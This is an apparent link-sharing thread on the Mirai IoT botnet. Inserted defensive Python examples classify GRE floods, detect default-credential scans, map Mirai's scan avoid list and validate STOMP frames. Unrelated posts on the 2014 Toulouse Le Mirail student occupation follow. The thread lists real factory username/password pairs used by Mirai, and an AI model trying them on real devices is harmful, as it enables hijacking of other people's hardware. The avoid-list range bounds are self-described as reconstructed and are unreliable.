      Interesting article by F5 which goes in a bit more detail about the two types of GRE flood attacks (Ethernet and IP based)

      ▻https://f5.com/about-us/news/articles/mirai-the-iot-bot-that-took-down-krebs-and-launched-a-tbps-ddos-attack-on-ovh-21

      They also make a reference to the origin of the Mirai name:

      It seems that the bot creator named his creation after a Japanese series “Mirai Nikki (The Future Diary)” and uses the nickname of “Anna-senpai” referring to the “Shimoneta” series.

      ▻https://f5.com/Portals/1/Images/News/blogs/mirai-inspiration.JPG

      schrödinger @erratic
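The two GRE flood variants mentioned in the SecurityWeek, CyberX and F5 comments above differ only in the GRE protocol-type field: 0x0800 carries an inner IPv4 packet (GRE-IP), 0x6558 carries an inner Ethernet frame (transparent Ethernet bridging, GRE-Ethernet). The following is an added example, not code from the Mirai source or from any of the linked articles: it parses the outer IPv4 header and the RFC 2784/2890 GRE header (honouring the optional checksum, key and sequence fields), classifies each packet as GRE-IP, GRE-Ethernet, other GRE, non-GRE or malformed, and flags outer sources that exceed a per-source count. The packets it runs on are constructed inline (documentation addresses, zero checksums); the threshold is an assumption, not a tuned value.

```python
"""Classify GRE-encapsulated packets (Mirai's GRE-IP and GRE-Ethernet flood
modes) and flag sources sending them in volume. Added example; all packets
below are constructed inline, not captured traffic."""
import struct
from collections import Counter

IPPROTO_GRE = 47
IPPROTO_UDP = 17
ETHERTYPE_IPV4 = 0x0800   # GRE-IP: inner payload is an IPv4 packet
ETHERTYPE_TEB = 0x6558    # GRE-Ethernet: inner payload is an Ethernet frame


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal IPv4 header (no options, checksum left at zero) for constructed samples."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                         proto, 0, bytes(map(int, src.split("."))),
                         bytes(map(int, dst.split("."))))
    return header + payload


def build_gre(proto_type: int, inner: bytes, flags: int = 0, opts: bytes = b"") -> bytes:
    """GRE header per RFC 2784: 2 bytes flags/version, 2 bytes protocol type, optional fields."""
    return struct.pack("!HH", flags, proto_type) + opts + inner


def parse_ipv4(packet: bytes) -> dict:
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _, _, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("malformed IPv4 header")
    return {"proto": proto, "src": ".".join(map(str, src)),
            "dst": ".".join(map(str, dst)), "payload": packet[ihl:]}


def parse_gre(payload: bytes) -> dict:
    """Parse the GRE header; the C, K and S bits each add a 4-byte field before the inner packet."""
    if len(payload) < 4:
        raise ValueError("truncated GRE header")
    flags, proto_type = struct.unpack("!HH", payload[:4])
    offset = 4
    if flags & 0x8000:
        offset += 4   # checksum + reserved1
    if flags & 0x2000:
        offset += 4   # key
    if flags & 0x1000:
        offset += 4   # sequence number
    if len(payload) < offset:
        raise ValueError("truncated GRE optional fields")
    return {"proto_type": proto_type, "inner": payload[offset:]}


def classify(packet: bytes) -> str:
    """Return 'gre-ip', 'gre-eth', 'gre-other', 'non-gre' or 'malformed' for one outer IPv4 packet."""
    try:
        ip = parse_ipv4(packet)
        if ip["proto"] != IPPROTO_GRE:
            return "non-gre"
        gre = parse_gre(ip["payload"])
    except ValueError:
        return "malformed"
    if gre["proto_type"] == ETHERTYPE_IPV4:
        return "gre-ip"
    if gre["proto_type"] == ETHERTYPE_TEB:
        return "gre-eth"
    return "gre-other"


def gre_flood_report(packets, threshold: int) -> dict:
    """Count GRE packets per (outer source, kind); flag sources at or above threshold."""
    counts = Counter()
    for pkt in packets:
        kind = classify(pkt)
        if kind.startswith("gre"):
            counts[(parse_ipv4(pkt)["src"], kind)] += 1
    flagged = sorted({src for (src, _), n in counts.items() if n >= threshold})
    return {"counts": dict(counts), "flagged": flagged}


def sample_packets() -> list:
    """Constructed sample: 30 GRE-IP packets from one source, 5 GRE-Ethernet from another, 1 plain UDP."""
    inner_ip = build_ipv4("10.0.0.1", "10.0.0.2", IPPROTO_UDP, b"\x00" * 32)
    eth_frame = b"\xff" * 6 + b"\x02\x00\x00\x00\x00\x01" + struct.pack("!H", ETHERTYPE_IPV4) + inner_ip
    gre_ip = build_ipv4("198.51.100.7", "192.0.2.10", IPPROTO_GRE, build_gre(ETHERTYPE_IPV4, inner_ip))
    gre_eth = build_ipv4("203.0.113.9", "192.0.2.10", IPPROTO_GRE, build_gre(ETHERTYPE_TEB, eth_frame))
    plain_udp = build_ipv4("203.0.113.9", "192.0.2.10", IPPROTO_UDP, b"hello")
    return [gre_ip] * 30 + [gre_eth] * 5 + [plain_udp]


if __name__ == "__main__":
    print(gre_flood_report(sample_packets(), threshold=20))
```

On a real link the per-source count would be taken over a time window from a capture; the point of the classifier is that GRE from hosts that have no tunnel configured is itself the signal, whichever of the two inner formats the bot chose.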
    • @sandburg
      Sandburg @sandburg CC BY-SA 8/10/2016

      Default passwords for the most popular devices.
      www.phenoelit.org/dpl/dpl.html

      admin 123456
      admin password
      Cisco Cisco
      login password
      root password
      …
      The funniest one:
      Administrator changeme

      Sandburg @sandburg CC BY-SA
    • @erratic
      schrödinger @erratic 8/10/2016

      Here are the 61 passwords that powered the Mirai IoT botnet
      ▻http://www.csoonline.com/article/3126924/security/here-are-the-61-passwords-that-powered-the-mirai-iot-botnet.html

      http://images.techhive.com/images/article/2016/10/mirai_botnet_passwords-100685646-orig.jpg

      schrödinger @erratic
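Both lists above (the phenoelit DPL sample and the 61 Mirai pairs) are only useful if something checks against them. The following is an added example, not code from Mirai or from either article: a default-credential check that can be used at provisioning time, plus a detector run over telnet honeypot login events that flags a source cycling through several known default pairs within a short window, which is what Mirai's scanner looks like from the receiving end. The credential set is a constructed subset: the first six pairs are the ones quoted from phenoelit above, the rest are pairs from the leaked Mirai scanner, not the full 61-entry list. The log line format, the window and the threshold are assumptions.

```python
"""Default-credential policy check and Mirai-style credential-scan detection
over telnet honeypot events. Added example; log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed subset: the six phenoelit pairs quoted above plus pairs from the
# leaked Mirai scanner. Not the full 61-entry list.
DEFAULT_CREDENTIALS = {
    ("admin", "123456"), ("admin", "password"), ("Cisco", "Cisco"),
    ("login", "password"), ("root", "password"), ("Administrator", "changeme"),
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("support", "support"),
}

# Assumed honeypot log format, not any real product's format.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<result>ok|fail)$")


def is_default_credential(user: str, pw: str) -> bool:
    """Provisioning-time check: refuse credentials that appear in the default list."""
    return (user, pw) in DEFAULT_CREDENTIALS


def parse_line(line: str):
    """Return the event as a dict, or None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def analyse(lines, min_distinct_pairs: int = 3, window: timedelta = timedelta(minutes=5)) -> dict:
    """Flag sources that try >= min_distinct_pairs distinct default pairs inside any window,
    and list every successful login that used a default pair."""
    attempts = defaultdict(list)   # src -> [(ts, (user, pw))], default-pair attempts only
    default_logins = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue               # a real pipeline would count unparseable lines
        pair = (ev["user"], ev["pw"])
        if not is_default_credential(*pair):
            continue
        attempts[ev["src"]].append((ev["ts"], pair))
        if ev["result"] == "ok":
            default_logins.append((ev["src"], ev["user"], ev["pw"]))
    scanners = {}
    for src, evs in attempts.items():
        evs.sort()
        best = 0
        for i, (start, _) in enumerate(evs):   # each attempt opens a candidate window
            seen = {pair for ts, pair in evs[i:] if ts - start <= window}
            best = max(best, len(seen))
        if best >= min_distinct_pairs:
            scanners[src] = best
    return {"scanners": scanners, "default_logins": default_logins}


# Constructed sample: one source cycling through the list like Mirai, one source
# with two attempts an hour apart, one non-default attempt, one garbage line.
SAMPLE_LOG = """\
2016-10-01T12:00:01Z src=198.51.100.7 user=root pass=xc3511 result=fail
2016-10-01T12:00:02Z src=198.51.100.7 user=root pass=vizxv result=fail
2016-10-01T12:00:03Z src=198.51.100.7 user=admin pass=admin result=fail
2016-10-01T12:00:04Z src=198.51.100.7 user=root pass=password result=ok
2016-10-01T12:00:10Z src=203.0.113.5 user=admin pass=password result=fail
2016-10-01T13:30:00Z src=203.0.113.5 user=root pass=password result=fail
2016-10-01T12:01:00Z src=192.0.2.22 user=alice pass=correct-horse result=fail
garbage line
""".splitlines()


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

The detector keys on distinct default pairs rather than raw failure counts, so a single fat-fingered admin login is not a hit while four different factory credentials in a few seconds is; the successful-login list is the part that actually matters, since it names devices that still answer to a default pair.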
    • @erratic
      schrödinger @erratic 14/10/2016

      Some more information on its spread, operations, and code, by Incapsula.

      ▻https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

      One of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans.

      This list is interesting, as it offers a glimpse into the psyche of the code’s authors. On the one hand, it exposes concerns of drawing attention to their activities. A concern we find ironic, considering that this malware was eventually used in one of the most high-profile attacks to date.

      schrödinger @erratic
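The avoid list discussed in the Incapsula comment above is worth having in machine-readable form, because a sensor (honeypot, darknet telescope) that sits inside one of those ranges will never observe a Mirai scan. The following is an added example, not code from the Mirai source or from Incapsula: it encodes the skipped ranges, reports which of your sensor addresses are blind to the scanner, computes how much of IPv4 the list removes, and reproduces the scanner's target selection as rejection sampling over the same list. The private, loopback, link-local, CGNAT, benchmarking and multicast blocks are certain; the owners of the others (USPS, DoD, HP, GE) follow the Incapsula write-up, but the exact bounds are my reconstruction from the leaked scanner.c and should be verified against the source.

```python
"""Mirai scanner avoid list: blind-spot check for sensors, coverage of IPv4,
and target selection by rejection sampling. Added example; the range bounds
marked below are reconstructed, not copied from the leaked source."""
import ipaddress
import random

SKIPPED_RANGES = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10", "198.18.0.0/15",
    "224.0.0.0/3",                        # multicast and reserved
    "3.0.0.0/8",                          # General Electric (reconstructed bound)
    "15.0.0.0/8", "16.0.0.0/8",           # Hewlett-Packard (reconstructed bounds)
    "56.0.0.0/8",                         # US Postal Service (reconstructed bound)
    "6.0.0.0/7", "11.0.0.0/8", "21.0.0.0/8", "22.0.0.0/8", "26.0.0.0/8",
    "28.0.0.0/7", "30.0.0.0/8", "33.0.0.0/8", "55.0.0.0/8", "214.0.0.0/7",   # DoD (reconstructed)
)]


def skipped_range(ip: str):
    """Return the network that makes the scanner skip this address, or None."""
    addr = ipaddress.ip_address(ip)
    for net in SKIPPED_RANGES:
        if addr in net:
            return net
    return None


def is_skipped(ip: str) -> bool:
    return skipped_range(ip) is not None


def sensor_blind_spots(sensor_ips) -> list:
    """Sensors placed inside a skipped range will never see Mirai's scanner."""
    return [ip for ip in sensor_ips if is_skipped(ip)]


def skipped_fraction() -> float:
    """Share of the IPv4 space the list removes (ranges above do not overlap)."""
    return sum(net.num_addresses for net in SKIPPED_RANGES) / 2 ** 32


def sample_targets(seed: int, n: int) -> list:
    """Reproduce the scanner's selection: random 32-bit addresses, rejected when skipped."""
    rng = random.Random(seed)
    out = []
    while len(out) < n:
        ip = str(ipaddress.ip_address(rng.getrandbits(32)))
        if not is_skipped(ip):
            out.append(ip)
    return out


if __name__ == "__main__":
    print(f"skipped: {skipped_fraction():.1%} of IPv4")
    print(sensor_blind_spots(["127.0.0.1", "10.8.0.1", "203.0.113.9"]))
    print(sample_targets(seed=1, n=5))
```

Roughly a fifth of the address space is never probed, and the interesting part for defenders is not the RFC 1918 entries but the organisation-specific /8s: a scan that does reach those ranges is, by construction, not the original Mirai scanner.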
    • @erratic
      schrödinger @erratic 15/10/2016

      US-CERT Threat Alert: Heightened DDoS Threat Posed by Mirai and Other Botnets
      ▻https://www.us-cert.gov/ncas/alerts/TA16-288A

      schrödinger @erratic
    • @sandburg
      Sandburg @sandburg CC BY-SA 16/10/2016

      ▻http://www.defaultpassword.com/?action=dpl

      Sandburg @sandburg CC BY-SA
    • @erratic
      schrödinger @erratic 30/10/2016

      ▻http://www.securityweek.com/whats-fix-iot-ddos-attacks

      HTTP GET floods were already pernicious. For years, attackers have been able to disable web sites by sending a flood of HTTP requests for large objects or slow database queries. Typically, these requests flow right through a standard firewall because hey, they look just like normal HTTP requests to most devices with hardware packet processing. The Mirai attack code takes it a step further by fingerprinting cloud-based DDoS scrubbers and then working around some of their HTTP DDoS mitigation techniques (such as redirection).

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 19/11/2016

      Mirai botnet leverages #STOMP Protocol to power DDoS attacks.

      ▻http://securityaffairs.co/wordpress/53544/malware/mirai-botnet-stomp.html

      STOMP is a simple application layer, text-based protocol [an alternative to other open messaging protocols, such as AMQP (Advanced Message Queuing Protocol)] that allows clients to communicate with message brokers. It implements a communication method for applications developed using different programming languages.

      [...]

      Below the steps of the DDoS STOMP attack:

      • A botnet device uses STOMP to open an authenticated TCP handshake with a targeted application.
      • Once authenticated, junk data disguised as a STOMP TCP request is sent to the target.
      • The flood of fake STOMP requests leads to network saturation.
      • If the target is programmed to parse STOMP requests, the attack may also exhaust server resources. Even if the system drops the junk packets, resources are still used to determine if the message is corrupted.

      How Mirai Uses STOMP Protocol to Launch DDoS Attacks

      ▻https://www.incapsula.com/blog/mirai-stomp-protocol-ddos.html

      schrödinger @erratic
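The last step in the list above is the one a broker operator can influence: junk disguised as STOMP still costs parsing time unless the server rejects it as early and as cheaply as possible. The following is an added example, not code from the Incapsula or Security Affairs articles and not any real broker's implementation: a strict STOMP 1.2 frame parser that checks size, NUL terminator and command name before touching headers, enforces header and content-length consistency, and a per-connection guard that drops a peer after a few malformed frames instead of parsing junk indefinitely. The frame size cap, header cap and drop threshold are assumptions; the spec leaves those limits to the server.

```python
"""Strict STOMP frame validation with a per-connection budget for malformed
frames. Added example; sample frames are constructed inline."""

STOMP_COMMANDS = frozenset(
    b"CONNECT STOMP SEND SUBSCRIBE UNSUBSCRIBE ACK NACK BEGIN COMMIT ABORT DISCONNECT".split())
MAX_FRAME_BYTES = 4096     # assumed cap
MAX_HEADERS = 16           # assumed cap


class FrameError(ValueError):
    """Carries a short reason; the caller never receives a partially parsed frame."""


def parse_frame(buf: bytes, max_frame: int = MAX_FRAME_BYTES, max_headers: int = MAX_HEADERS) -> dict:
    # Cheapest checks first, so junk is rejected before any header work.
    if len(buf) > max_frame:
        raise FrameError("frame too large")
    if not buf.endswith(b"\x00"):
        raise FrameError("missing NUL terminator")
    command = buf.split(b"\n", 1)[0]
    if command not in STOMP_COMMANDS:
        raise FrameError("unknown command")
    head, sep, body = buf[:-1].partition(b"\n\n")
    if not sep:
        raise FrameError("no header/body separator")
    lines = head.split(b"\n")
    if len(lines) - 1 > max_headers:
        raise FrameError("too many headers")
    headers = {}
    for raw in lines[1:]:
        key, colon, value = raw.partition(b":")
        if not colon or not key:
            raise FrameError("malformed header")
        try:
            headers.setdefault(key.decode("utf-8"), value.decode("utf-8"))   # first occurrence wins
        except UnicodeDecodeError:
            raise FrameError("non-UTF-8 header")
    if "content-length" in headers:
        try:
            declared = int(headers["content-length"])
        except ValueError:
            raise FrameError("bad content-length")
        if declared != len(body):
            raise FrameError("content-length mismatch")
    elif b"\x00" in body:
        raise FrameError("NUL in body without content-length")
    return {"command": command.decode("ascii"), "headers": headers, "body": body}


def reject_reason(buf: bytes):
    """Reason string for a rejected frame, or None when the frame is valid."""
    try:
        parse_frame(buf)
        return None
    except FrameError as exc:
        return str(exc)


class ConnectionGuard:
    """Drop a peer after max_bad malformed frames: junk gets one cheap rejection each, then the socket."""

    def __init__(self, max_bad: int = 3):
        self.max_bad = max_bad
        self.bad = 0
        self.dropped = False

    def feed(self, buf: bytes):
        if self.dropped:
            return ("dropped", "connection already dropped")
        try:
            return ("frame", parse_frame(buf))
        except FrameError as exc:
            self.bad += 1
            if self.bad >= self.max_bad:
                self.dropped = True
                return ("dropped", str(exc))
            return ("rejected", str(exc))


# Constructed samples.
GOOD_CONNECT = b"CONNECT\naccept-version:1.2\nhost:broker.example\n\n\x00"
GOOD_SEND = b"SEND\ndestination:/queue/a\ncontent-length:5\n\nhello\x00"
JUNK = b"A" * 64 + b"\x00"

if __name__ == "__main__":
    guard = ConnectionGuard(max_bad=2)
    for frame in (GOOD_CONNECT, JUNK, GOOD_SEND, JUNK, GOOD_SEND):
        print(guard.feed(frame)[0])
```

The command check runs on the first line only and the size check on the length only, so a flood of random bytes never reaches the header loop; the guard turns "resources are still used to determine if the message is corrupted" from a per-frame cost into a per-connection one.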
    • @erratic
      schrödinger @erratic 29/11/2016

      Mirai botnet with 400,000 devices now for rent

      ▻http://www.ibtimes.co.uk/ddos-hire-service-now-advertising-renting-out-400000-bot-strong-mirai-bot

      A DDoS-for-hire service, run by two hackers going by the pseudonyms Popopret and BestBuy, is now reportedly advertising a Mirai botnet up for rent. The Mirai botnet allegedly comprises over 400,000 infected bots and may have been sired from the original Mirai source code.

      [...]

      Renting the botnet does not come cheap. Customers desiring to rent the botnet must do so for a minimum of two weeks. However, clients can determine the number of bots, the attack duration and the DDoS cool down (a term which refers to the length of time between consecutive attacks).

      [...]

      Popopret and BestBuy’s Mirai botnet is a more evolved version of the original botnet. The two hackers have added new features, such as brute-force attacks via SSH and support for exploiting zero-day vulnerabilities. According to two security researchers, going by the handles 2sec4u and MalwareTech on Twitter, some of the newly created Mirai botnets can now carry out DDoS attacks by spoofing IP addresses and may also be capable of bypassing DDoS mitigation systems.

      Source:
      ▻http://www.bleepingcomputer.com/news/security/you-can-now-rent-a-mirai-botnet-of-400-000-bots

      schrödinger @erratic
    • @erratic
      schrödinger @erratic 21/08/2017

      Understanding the Mirai Botnet

      ▻https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf

      In this paper, we provide a seven-month retrospective analysis of Mirai’s growth to a peak of 600k infections and a history of its DDoS victims. By combining a variety of measurement perspectives, we analyze how the botnet emerged, what classes of devices were affected, and how Mirai variants evolved and competed for vulnerable hosts. Our measurements serve as a lens into the fragile ecosystem of IoT devices. We argue that Mirai may represent a sea change in the evolutionary development of botnets: the simplicity through which devices were infected and its precipitous growth demonstrate that novice malicious techniques can compromise enough low-end devices to threaten even some of the best-defended targets. To address this risk, we recommend technical and nontechnical interventions, as well as propose future research directions.

      #DDoS

      schrödinger @erratic
  • @samizdat
    samizdat @samizdat CC BY-SA 27/09/2016

    The board of directors invaded by psychology staff and students. #Toulouse #Mirail ►http://fb.me/7C7V6U0O4
    ▻https://twitter.com/RevPermanente/status/780743823974658048


    samizdat @samizdat CC BY-SA
  • @parpaing
    parpaing @parpaing 24/11/2014

    Le lien. Newsletter of the Mirail in movement, an issue 1 made up of a single double-sided A4 text, which is an interesting basic reflection on the ways of getting into motion.

    ►http://www.reporterre.net/IMG/pdf/le_lien1.pdf

    http://www.reporterre.net/local/cache-vignettes/L454xH340/zone_d_interpellation_chaleureuse_v_1-e374d.jpg http://www.reporterre.net/local/cache-vignettes/L400xH300/arton6591-6b6e4.jpg

    (Found via the article < At the University of Toulouse, a camp against the Sivens dam and state violence > ▻http://www.reporterre.net/spip.php?article6591 )

    #testet #toulouse #revue

    parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      For two weeks, we have repeatedly heard “what is the link between the Sivens dam, police violence and study conditions?”. The slogan “Money for universities, high schools and biodiversity, not for the police and the army” at least had the merit, let us admit, of trying to answer this question by creating a link between the three themes: money. More of it would be needed for some things and less for others. If we face social, environmental, political etc. problems, the solution would be to have more money, or at least a better distribution of it.

      Let us start from the opposite premise: money is not the solution but one of the problems. The link between all this, but also between many other things, is the transformation of every aspect of our existences into a product, and the expropriation that goes with it. The economic has invaded our existences and dispossessed us of them. From teaching to the “management of nature”, by way of security, spaces, travel, relationships, culture, opinions etc., there is not one dimension that escapes this subordination to economic logic. So much so that none of them seems to be ours any more, so much so that we are reduced to consuming them while others manage them for us, while others manage our existences.
      Thus, what is at stake would not be a potential increase in the budgets allocated to universities and biodiversity, but indeed a reappropriation of the various dimensions of our existences, starting, for students, with their universities.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      It is time to stop naively asking our leaders (sorry, our representatives) to kindly respect our will and not impose theirs on us, to kindly give us back what they have taken from us.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      To occupy a space is to reappropriate it, to make it ours and to develop a collective life there. To occupy is above all to meet and to weave links between what was previously only isolation and the unknown. To occupy is to take charge of our needs and to reorganise our existences together within a whole, not necessarily homogeneous but united.

      Occupation is the anchoring of the struggle in everyday life. It is a permanent struggle that does not stop at a given moment of the day, unlike the demonstration, which starts and ends at a precise time. To occupy is therefore also to give ourselves the time needed for any elaboration of a struggle through discussions, reflections, debates and even arguments.

      Occupation is not a demand addressed to leaders, it is an affirmation of our capacity to organise ourselves without them. Let us occupy this university, let us reappropriate our university. Let us eat there, sleep there, live there together, in order to give ourselves the time to put in place, on the one hand, means of opposing those who impose their views on us, and on the other hand, means of taking our existences back into our own hands.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      <Thursday 20 November, first blockade of the campus, 1,500 students in general assembly, and demonstration in the city centre: Avanti le #Mirail!>
      ▻http://www.ccr4.org/Jeudi-20-novembre-premier-blocage-du-campus-1500-etudiants-en-AG-et-manifestat

      After a general assembly of 1,200 on Thursday the 13th, around 1,500 students voted yesterday, after a first blockade of the university, for a new blockade with occupation on Tuesday the 25th. First test, first electroshock: staff and students forced to talk to each other, next to a symbolic micro-ZAD planted in the central garden of the campus.

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 24/11/2014

      And for more information on the movement in Toulouse, it is over here: ►http://iaata.info

      And here is an aggregator that brings together Toulouse, Paris, Tours and Rebellyon:
      ►http://mutu.mediaslibres.org

      parpaing @parpaing
    • @parpaing
      parpaing @parpaing 25/11/2014

      The mobilisation committee of the University of Toulouse - Le Mirail has created a newspaper to report on their struggle... Issue 1 of Monday 24 November...
      ▻http://iaata.info/Direct-lutte-le-journal-des-435.html

      http://iaata.info/chroot/mediaslibres/ml-toulouse/ml-toulouse/public_html/IMG/png/direct_lutte1p1.png http://iaata.info/chroot/mediaslibres/ml-toulouse/ml-toulouse/public_html/IMG/png/direct_lutte1p2.png

      parpaing @parpaing
